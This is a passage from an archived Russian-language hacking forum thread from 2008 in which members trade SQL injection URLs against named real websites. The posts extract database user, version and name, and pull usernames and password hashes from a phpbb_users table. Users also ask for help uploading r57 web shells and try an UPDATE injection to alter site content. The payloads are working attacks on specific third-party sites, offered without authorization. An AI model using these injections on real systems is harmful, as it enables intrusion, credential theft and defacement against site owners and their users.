ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2051  
Старый 24.05.2008, 15:17
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

2†c0(aIn?†
Там две колонки Вот вывод:
_http://www.fondationbrigittebardot.fr/site/actu_en.php?id=75018+union+select+AES_DECRYPT(AES_ ENCRYPT(concat(user(),char(58),version(),char(58), database()),0x71),0x71),2/*
 
Ответить с цитированием

  #2052  
Старый 24.05.2008, 15:34
†c0(aIn?†
Новичок
Регистрация: 04.05.2008
Сообщений: 16
Провел на форуме:
209786

Репутация: 45
По умолчанию

Цитата:
Сообщение от jokester  
2†c0(aIn?†
Там две колонки Вот вывод:
_http://www.fondationbrigittebardot.fr/site/actu_en.php?id=75018+union+select+AES_DECRYPT(AES_ ENCRYPT(concat(user(),char(58),version(),char(58), database()),0x71),0x71),2/*
Спасибо огромное,что помог.Кста,где можно почитать про спец.функции подобного рода или что-то типа этого?Перечитал все статьи [ cash ]'a,но про это ничего не нашел.

ЗЫ:Буду ещё очень благодарен,если кто-нить подробно распишет,как залить шелл(например r57),инструкцию желательно в пм)

Последний раз редактировалось †c0(aIn?†; 24.05.2008 в 15:39..
 
Ответить с цитированием

  #2053  
Старый 24.05.2008, 15:50
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

†c0(aIn?†
Это просто один из вариантов обойти кодировку.Про MySql можешь почитать например сдесь:
_http://phpclub.ru/mysql/doc/reference.html
Статьи по скулям на форуме :
_https://forum.antichat.ru/thread19605.html
_https://forum.antichat.ru/thread43966.html
 
Ответить с цитированием

  #2054  
Старый 24.05.2008, 16:12
1SeTh
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
Провел на форуме:
2406659

Репутация: 34
По умолчанию

Цитата:
Сообщение от jokester  
Вот так ещё лучше:
_http://dragonshc.org/mx/index.php?page=-1+union+select+1,concat(version(),0x3a,database(), 0x3a,user()),3,4,5,null/*
Вывод в <title> ,хотя, кому как удобнее
ок, а теперь как подобрать колонну для mx_page?
 
Ответить с цитированием

  #2055  
Старый 24.05.2008, 17:12
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217

Репутация: 2097
По умолчанию

Скачай исходники MX-System и посмотри там, а вообще не думаю что в этой таблице будет что-то интересное, лучше смотри таблицу phpbb_users, http://dragonshc.org/mx/index.php?page=-1+union+select+1,concat_ws(0x3a,username,user_pass word),3,4,5,null%20from%20phpbb_users%20limit%201, 1/*
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием

  #2056  
Старый 24.05.2008, 19:36
ad1das
Новичок
Регистрация: 12.03.2008
Сообщений: 9
Провел на форуме:
97055

Репутация: 2
По умолчанию

Помогите с заливкой шелла в Ipb 2.3.3
 
Ответить с цитированием

  #2057  
Старый 25.05.2008, 17:38
maxclk
Новичок
Регистрация: 15.03.2007
Сообщений: 9
Провел на форуме:
91141

Репутация: 0
По умолчанию

никак не могу проапдейтить:
comments.php?news_id=-1+update+table.news+set+title='lol'+where+id='517'/*
пишет
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'update table.news set title='lol' where id='517'/*' at line 1
помогите, плз
 
Ответить с цитированием

  #2058  
Старый 25.05.2008, 17:44
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

через инъекцию update не сделаешь...
 
Ответить с цитированием

  #2059  
Старый 25.05.2008, 17:52
maxclk
Новичок
Регистрация: 15.03.2007
Сообщений: 9
Провел на форуме:
91141

Репутация: 0
По умолчанию

2aka PSIH
в mysql?
в mssql проходил
 
Ответить с цитированием

  #2060  
Старый 25.05.2008, 18:00
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

>в mysql?
да, если иньекция в select запросе, то update не прокатит


>в mssql проходил
в mssql можно разделить запрос, в mysql нет...

Последний раз редактировалось aka PSIH; 25.05.2008 в 18:02..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ